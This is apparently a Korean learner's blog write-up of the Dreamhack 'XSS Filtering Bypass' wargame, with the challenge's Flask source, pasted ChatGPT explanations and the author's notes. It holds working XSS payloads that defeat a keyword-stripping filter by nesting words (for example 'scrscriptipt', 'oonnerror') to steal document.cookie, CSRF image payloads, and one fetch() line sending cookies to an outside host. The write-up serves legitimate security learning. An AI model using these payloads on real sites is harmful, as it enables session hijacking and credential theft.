50문제까지 벌써 한문제 남았다..
시간 정말 빠르다..흘러가는 시간을 잡고싶지만 그저 하루하루 시간을 즐겁고 소중하게 보내는게 최선이다
오늘도 즐겁게 문제를 풀어보자!
**XSS Filtering Bypass** refers to techniques used to bypass security filters that are designed to prevent **Cross-Site Scripting (XSS)** attacks. XSS is a type of security vulnerability in which an attacker injects malicious scripts, typically JavaScript, into websites viewed by other users. The goal of XSS filtering bypass is to exploit weaknesses in the website's filtering mechanisms and insert harmful code, despite security measures.
When developers implement XSS filters, they usually attempt to sanitize or filter out malicious code, such as `<script>` tags, to prevent them from being executed. However, XSS filtering is challenging to implement perfectly because attackers can often find creative ways to bypass these filters.
### Common XSS Filtering Bypass Techniques
1. **Encoding Techniques**: Using different encodings like URL encoding, HTML entities, or Base64 to obfuscate malicious code and bypass filters.
- Example: Using `<script>` instead of `<script>`.
2. **Event Handlers**: Injecting JavaScript into HTML attributes like `onload`, `onclick`, `onmouseover`, etc., which execute code when triggered by user actions.
- Example: `<img src="image.jpg" onerror="alert('XSS')">`
3. **Bypassing Blacklists**: If filters block specific keywords (e.g., `script`), attackers may use variations or alternative tags (like SVG or MathML) that can still execute JavaScript.
- Example: `<svg/onload=alert(1)>`
4. **DOM-based XSS**: Manipulating the Document Object Model (DOM) directly using JavaScript, bypassing filters on the server side and injecting scripts client-side.
5. **Nested Tags and Attributes**: Using tags within tags or unexpected attribute combinations that might evade detection.
- Example: `<a href="javascript:alert(1)">Click</a>`
6. **Injection in Comments or CSS**: Bypassing filters by embedding payloads within HTML comments or CSS properties, which may later get interpreted in unintended ways.
- Example: `<!--<script>alert('XSS')</script>-->`
### Why It Matters
XSS filtering bypasses can allow attackers to:
- Steal session cookies, tokens, or user credentials.
- Redirect users to phishing pages.
- Manipulate website content for malicious purposes.
To counter XSS attacks and bypass attempts, modern security practices favor **Content Security Policies (CSP)**, **input sanitization**, **output encoding**, and **frameworks with built-in XSS protections** over relying solely on blacklists or custom filters.
헤에..우리 gpt 이제 영어로 알려준다 영어공부 하라는 깊은 뜻인듯..
소스코드를 보러가자
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
def xss_filter(text):
_filter = ["script", "on", "javascript:"]
for f in _filter:
if f in text.lower():
text = text.replace(f, "")
return text
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
param = xss_filter(param)
return param
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)
This code is a basic Flask web application with multiple routes, including a potential **Cross-Site Scripting (XSS) vulnerability**. Here’s a detailed analysis:
### Key Components of the Code
1. **Application Setup**:
- The Flask application is initialized with `app = Flask(__name__)`, and a secret key is generated with `app.secret_key = os.urandom(32)`.
- The application attempts to read a flag from `./flag.txt`. If it fails, a placeholder is assigned.
2. **XSS Protection and Vulnerabilities**:
- The `xss_filter` function is implemented to sanitize input, but it only filters specific keywords (`"script"`, `"on"`, and `"javascript:"`), which leaves the code susceptible to **XSS bypass techniques** that don't use these exact keywords.
3. **`read_url` Function with Selenium**:
- This function loads a URL (`http://127.0.0.1:8000/`) with a **Selenium WebDriver**.
- It sets cookies for the session, including a flag as a cookie if the user input passes the `check_xss` function.
- However, if an error occurs during page load, the driver quits, and the function returns `False`.
4. **Routes**:
- **`/` Route** (`index`): Renders the home page (`index.html`).
- **`/vuln` Route** (`vuln`): Takes a `param` query parameter and applies `xss_filter` to it, but due to limited keyword-based filtering, it's vulnerable to XSS bypasses (e.g., `<img src=x onerror=alert(1)>`).
- **`/flag` Route** (`flag`):
헤에 또 onerror인가 반갑군
- On a `POST` request, the `param` parameter is checked with `check_xss`. If the input passes (returns `True`), an alert shows `"good"`, and if not, it shows `"wrong??"`.
- It also attempts to set a cookie (`flag`) for XSS verification.
- **`/memo` Route** (`memo`): Accepts `memo` parameters and appends them to `memo_text`. It’s also vulnerable to XSS, as it directly appends user input without sanitization.
5. **Security Weaknesses**:
- **Inadequate XSS Filtering**: The `xss_filter` function is easily bypassed because it only removes a few specific keywords. Other forms of HTML or JavaScript injection, like `<img onerror="alert(1)">`, could evade this filter.
- **`memo_text` Accumulation**: Since `memo_text` appends unsanitized input, it could allow persistent XSS if users add scripts that get displayed to future viewers.
- **Flag Exposure**: The `/flag` endpoint's `POST` request and the `check_xss` function attempt to secure the flag in a cookie, but since it relies on inadequate filtering, a skilled attacker could exploit this flaw to reveal the flag.
### Suggested Improvements
1. **Stronger XSS Filtering**:
- Use a comprehensive library like `bleach` to sanitize HTML inputs, or rely on **Content Security Policy (CSP)** headers to prevent script execution.
확실히 보안을 위해선 다른 여러가지 이것저것 많이 쓰라하네
2. **Escape Output for `memo_text`**:
- Instead of directly rendering `memo_text` in the `memo.html` template, escape any special characters to prevent injected scripts from executing.
3. **Refactor `check_xss` Logic**:
- The `check_xss` function should implement stricter checks, perhaps disallowing all HTML tags instead of specific keywords, to mitigate XSS vulnerabilities more effectively.
4. **Enhance Cookie Security**:
- Set cookies with `Secure` and `HttpOnly` attributes to mitigate exposure risks.
전 문제들을 다 줏어왔다
<script>location.href="http://127.0.0.1:8000/memo?memo=hello"+document.cookie;</script>
https://imaginefuture-1.tistory.com/38
[36] IT 비전공자 [dreamhack]xss-1문제 풀기
36번째 문제 가보자고! XSS(교차 사이트 스크립팅, Cross-Site Scripting) 취약점은 공격자가 악성 스크립트를 웹 페이지에 삽입하여 다른 사용자의 브라우저에서 실행되도록 하는 공격
imaginefuture-1.tistory.com
<img src="xss" onerror="location.href='/memo?memo='+document.cookie">
https://imaginefuture-1.tistory.com/45
[38] IT 비전공자 [dreamhack]xss-2문제 풀기
38번째 문제 가보자구 WEB 문제다 https://imaginefuture-1.tistory.com/38 [36] IT 비전공자 [dreamhack]xss-1문제 풀기36번째 문제 가보자고! XSS(교차 사이트 스크립팅, Cross-Site Scripting) 취약점은 공격자가
imaginefuture-1.tistory.com
<img src=/admin/notice_flag?userid=admin>
https://imaginefuture-1.tistory.com/47
[39] IT 비전공자 [dreamhack]csrf-1문제 풀기
39번째 문제 가보자 forgery=위조 **CSRF (Cross-Site Request Forgery)**는 웹 보안 취약점 중 하나로, 악의적인 웹사이트가 사용자의 브라우저를 이용해 사용자가 의도하지 않은 행동을 하도록 유도하는
imaginefuture-1.tistory.com
<img src="/change_password?pw=admin">
https://imaginefuture-1.tistory.com/48
[40] IT 비전공자 [dreamhack]csrf-2문제 풀기
하아아아앗 csrf-2 40번째 문제 가봅시다!!! 하지만 guest 로그인 후 flag 페이지에서 스크립트를 입력해도 good 창만 뜨고 입력 받은거에 뭐 뜨는 페이지가 없다memo...memo 페이지
imaginefuture-1.tistory.com
<img src="xss" onerror="fetch('http://host3.dreamhack.games:19460?flag=' + document.cookie)">
했지만 안된다..이런이런..
또 문제야!
QnA를 열심히 뒤진다..
<scrscriptipt>locatioonn.href='/memo?memo='+document.cookie</scriscriptpt>
<img src=1 oonnerror='locatioonn.href="/memo?memo=" + document.cookie' />
<scrionpt>locatiojavascriptn.href="/memo?memo="+document.cookie</sconript
gpt:
These three scripts are variations on an **XSS payload** intended to exfiltrate cookies by appending them as URL parameters. Each of these scripts attempts to send the `document.cookie` value to the `/memo` endpoint, but they have different levels of syntax correctness and effectiveness. Let's go through each one.
---
### Script 1
```html
<scrscriptipt>locatioonn.href='/memo?memo='+document.cookie</scriscriptpt>
```
- **Explanation**: This script tries to use the `<script>` tag to execute JavaScript, but it intentionally includes misspellings (`scrscriptipt`, `locatioonn`, and `scriscriptpt`) to bypass basic filtering of the keyword `script`.
- **Functionality**: This script will **not work** in its current form. Browsers won’t recognize `scrscriptipt` as a valid `<script>` tag, and `locatioonn.href` is also not a valid method (it should be `location.href`). Therefore, this script won’t execute.
- **Effectiveness**: Low. To make it functional, the code would need to correct the misspellings to `script` and `location`.
### Script 2
```html
<img src=1 oonnerror='locatioonn.href="/memo?memo=" + document.cookie' />
```
- **Explanation**: This script uses an `<img>` tag with an `onerror` attribute, which triggers when the image fails to load (because `src=1` doesn’t resolve to an actual image). The `onerror` attribute attempts to set `location.href` to `/memo?memo=` followed by `document.cookie`.
- **Functionality**: This will also **not work** in its current form due to the misspelling `oonnerror` and `locatioonn.href`, which are invalid attributes and methods. These misspellings are probably intended to evade basic filters, but they prevent execution.
- **Effectiveness**: Low. This payload would work if the misspellings were corrected to `onerror` and `location`.
### Script 3
```html
<scrionpt>locatiojavascriptn.href="/memo?memo="+document.cookie</sconript>
```
- **Explanation**: This script again tries to use a `<script>` tag to run JavaScript, but it misspells `script` as `scrionpt` and `sconript` and includes an invalid `locatiojavascriptn.href`.
- **Functionality**: This will **not work** due to the misspelled tag (`scrionpt`) and the typo in `locatiojavascriptn.href`, which is not a valid command.
- **Effectiveness**: Low. Correcting the misspellings would make it functional, but in its current form, it cannot execute.
---
### Summary of Effectiveness
All three scripts include misspellings that break their functionality. They are likely attempts to bypass basic filtering, but these exact versions will not execute due to syntax errors.
**To make a functional payload**:
- Correct the keywords and methods.
- A simple and effective payload could look like this:
```html
<img src=1 onerror="location.href='/memo?memo=' + document.cookie" />
```
This payload would successfully redirect to `/memo` with the `document.cookie` attached as a parameter if no XSS filtering is in place to block it.
scrscriptipt`, `locatioonn`, and `scriscriptpt 우회하기 위해서 미스스펠링을 썼다고 제대로 된 스펠링으로 고쳐서
쓰라고 우리 gpt가 얘기한다 재밌는건
스펠링 오류난 스크립트는 flag가 보이고 스펠링 오류 안난건 flag가 안보인다..(?)
이게 우회랑 관련있는 것 같은데..어으ㅓ어
풀이..풀이글을보자
https://minnggyuu.tistory.com/7
[Dreamhack] XSS Filtering Bypass 풀이
오늘은 XSS Filtering Bypass를 풀어보자. 몇 달 전에 풀었지만 기억이 가물가물해서 다시 풀어볼거다. 문제 페이지이다. vuln(xss) page와 memo, flag 3개의 페이지가 따로 있다. vuln(xss) page를 접속하게 되면
minnggyuu.tistory.com
vuln(xss) 페이지에 필터링 하는 부분이 있었다.
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
param = xss_filter(param)
return param
/flag 페이지에서 /vuln으로 get을 보내는데 이 /vuln 페이지에서 필터링을 하고 있다.
vuln 함수는 param의 value값을 받아 xss_filter 함수에 전달하고
param = xss_filter(param)은 xss_filter함수로간다!
def xss_filter(text):
_filter = ["script", "on", "javascript:"]
for f in _filter:
if f in text.lower():
text = text.replace(f, "")
return text
xss_filter 함수는 script, on, javascript 를 필터링하고 있다.
xss_filter(text)에서 _filter한다 script, on, javascript. f를 ""로 대처한다(즉 삭제한다)
하지만 replace형식으로 되어있어 차단하는 게 아니라 필터링 단어를 없애는 방식으로 되어있다.
이렇게 되면 필터링 단어 안에 또 필터링 단어를 넣어 우회가 가능하다.
<scrscriptipt> -> (안에 있는 script 삭제) -> <script>
최종적으로 script가 남게 되므로 스크립트 실행이 가능하게 된다.
출처 : https://minnggyuu.tistory.com/7
캬 미스스펠링 쓰는 이유가 단어가 필터링되서 없애지니까! 추가해서 필터링되서 없어진 단어들로 스크립트가
작동되게하기위해서였다! (캬!) 다른 블로그 풀이글 보니 참고로 대문자도 가능하다한다
<img src oonnerror="locatioonn.href='/memo?memo='+document.cookie">
XSS Filtering Bypass
XSS Filtering BypassXSS Filtering ByPass문제 설명문제 풀이문제 요약문제 설명- 3개의 페이지와 각 페이지의 기능vuln(xss)page단순하게 이미지를 출력하는 페이지로 보입니다. 또한 GET방식을 사용하는것을
mokpo.tistory.com
이 분 블로그 글 마지막 이미지를 보면 작동원리, 순서에 대해 잘 정리해두셨다 캬!
<scscriptript>locatioonn.href="/memo?memo=" + document.cookie; </scscriptript>
<scscriptript>document["locatio" + "n"].href="/memo?memo=" + document.cookie; </scscriptript> (요건 좀 신기하다)
<img src=test oonnerror='locatioonn.href="/memo?memo=" + document.cookie;' />
payload 종류는 다양하다..
'Dreamhack > Dreamhack Wargame (Challenge)' 카테고리의 다른 글
| [51] IT 비전공자 [dreamhack]rev-basic-6문제 풀기 (2) | 2024.10.30 |
|---|---|
| [50] IT 비전공자 [dreamhack]php-1문제 풀기 (5) | 2024.10.29 |
| [48] IT 비전공자 [dreamhack]proxy-1문제 풀기 (4) | 2024.10.27 |
| [47] IT 비전공자 [dreamhack]simple-ssti문제 풀기 (1) | 2024.10.26 |
| [46] IT 비전공자 [dreamhack]rev-basic-4문제 풀기 (2) | 2024.10.25 |